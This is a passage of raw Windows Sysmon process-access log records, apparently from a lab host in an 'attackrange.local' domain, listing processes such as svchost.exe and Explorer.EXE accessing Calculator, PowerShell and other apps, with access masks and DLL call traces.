22:13:28.257{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361666Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361665Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16562144C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+9685f|C:\Windows\System32\TaskFlowDataEngine.dll+96359|C:\Windows\System32\TaskFlowDataEngine.dll+95d85|C:\Windows\System32\TaskFlowDataEngine.dll+93be5|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361664Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361663Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+374d7|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361662Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37271|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361661Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16568380C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+1dbfa|C:\Windows\System32\NPSMDesktopProvider.dll+139e2|C:\Windows\System32\NPSMDesktopProvider.dll+1415b|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361660Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+2aff6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361659Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361658Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-339f-6013-c402-000000001100}3448C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361657Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361656Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361655Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-337e-6013-9502-000000001100}7612C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361654Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-337c-6013-8e02-000000001100}1960C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361653Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3380-6013-9a02-000000001100}7332C:\Windows\System32\MicrosoftEdgeCP.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361652Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-337d-6013-9102-000000001100}7292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361651Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-339a-6013-c202-000000001100}10132C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361650Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3381-6013-9d02-000000001100}8712C:\Windows\SystemApps\InputApp_cw5n1h2txyewy\WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361649Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361648Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361647Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+320f9|C:\Windows\system32\twinui.pcshell.dll+31966|C:\Windows\system32\twinui.pcshell.dll+14b85|C:\Windows\system32\twinui.pcshell.dll+11de6|C:\Windows\system32\twinui.pcshell.dll+1a72c|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361646Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337e-6013-9402-000000001100}75849300C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361645Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-337b-6013-8402-000000001100}16567556C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+96e76|C:\Windows\System32\TaskFlowDataEngine.dll+93c96|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361644Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.241{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361643Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.241{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361642Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 